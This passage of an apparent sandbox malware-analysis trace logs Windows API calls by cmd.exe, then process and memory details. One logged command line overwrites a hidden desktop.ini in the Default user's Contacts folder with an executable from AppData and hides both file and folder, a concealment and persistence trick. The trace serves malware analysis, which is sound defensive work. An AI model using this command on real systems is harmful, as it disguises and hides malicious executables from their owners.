0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.887] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.887] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.888] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.888] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.889] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.889] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.890] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.890] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.891] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.891] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.892] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.892] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x32, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x32, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.892] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.893] _close (_FileHandle=4) returned 0 [0208.893] FindNextFileW (in: hFindFile=0x1e0e50, lpFindFileData=0x16f24c | out: lpFindFileData=0x16f24c) returned 0 [0209.258] GetLastError () returned 0x12 [0209.258] FindClose (in: hFindFile=0x1e0e50 | out: hFindFile=0x1e0e50) returned 1 [0209.258] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0209.259] _close (_FileHandle=3) returned 0 [0209.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.259] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0209.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.259] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0209.260] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.260] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0209.260] SetConsoleInputExeNameW () returned 0x1 [0209.260] GetConsoleOutputCP () returned 0x1b5 [0209.260] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0209.260] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.260] exit (_Code=0) Process: id = "507" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0x140" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30794 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30795 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30796 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30797 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 30798 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30799 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30800 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30801 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30802 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 30803 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30852 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30853 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30854 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 